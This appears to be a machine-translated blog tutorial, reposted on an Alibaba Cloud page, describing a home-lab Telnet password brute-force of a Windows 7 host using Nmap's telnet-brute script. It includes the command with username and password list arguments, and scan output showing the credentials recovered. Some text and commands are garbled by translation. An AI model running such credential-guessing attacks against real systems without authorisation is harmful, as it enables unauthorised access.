"20171115" Nmap uses script blasting telnet password

Source: Internet
Author: User

Today, old black out of the trough, set up a penalty mechanism after a lot of efficiency, now write a use NMAP to detect the target host and exploit the vulnerability of the article, say not much, directly start!

0X01: Introduction to the Environment

Host A: System-kali2017,ip-192.168.1.104

Host B: System-win7x64,ip-192.168.1.103

Use host A to scan and hack into Host B

0X02: Verify that Host B has telnet 23 port enabled

Host B does not open, I open it myself.

S1: Open or close the Windows program--check box, control Panel, programs, and then restart the system by clicking Confirm.

S2: Verify that the computer Telnet service is turned on. Open the computer, right-click Services, Services and applications, locate the Telnet service, and turn it on for services and settings automatically

0X03: In Host a scan, verify that Host B has port 23 turned on

  

0X04: For blasting

S1: See the official website, the blasting command is as follows

 --script telnet-brute--script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s < Target>

S2: Make your own myusers.lst and mypwds.lst

Lao Hei put his account aaaa in the Myusers.lst, as follows:

    

Aaaaaa22asdfsasdsdd

Put your own password bbbb in Mypwds.lst, as follows:

Bbbbbb23dfasdfasadfaa

Depending on the environment of host A, adjust the command as follows:

 at 192.168. 1.103

S3: Execute command, wait for result

[Email protected]:~# nmap-p--script telnet-brute--script-args userdb=./userpass/myusers.lst,passdb=./userpass/ mypwds.lst,telnet-brute.timeout=8s 192.168.1.103Starting Nmap 7.60 (https://nmap.org) at 2017-11-15 18:18 Cstnmap scan R Eport for Promote.cache-dns.local (192.168.1.103) Host was up (0.091s latency). PORT State   service23/tcp Open  telnet| telnet-brute: |   Accounts: |     Aaaa:bbbb-valid credentials|_  statistics:performed 6 guesses in 1 seconds, average Tps:6.0mac address:xxxxxxxxxxx XX (xxxxxxxxxxxx.) Nmap done:1 IP Address (1 host up) scanned in 1.49 seconds

  

0x05:telnet Landing host B,well done!

"20171115" Nmap uses script blasting telnet password

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.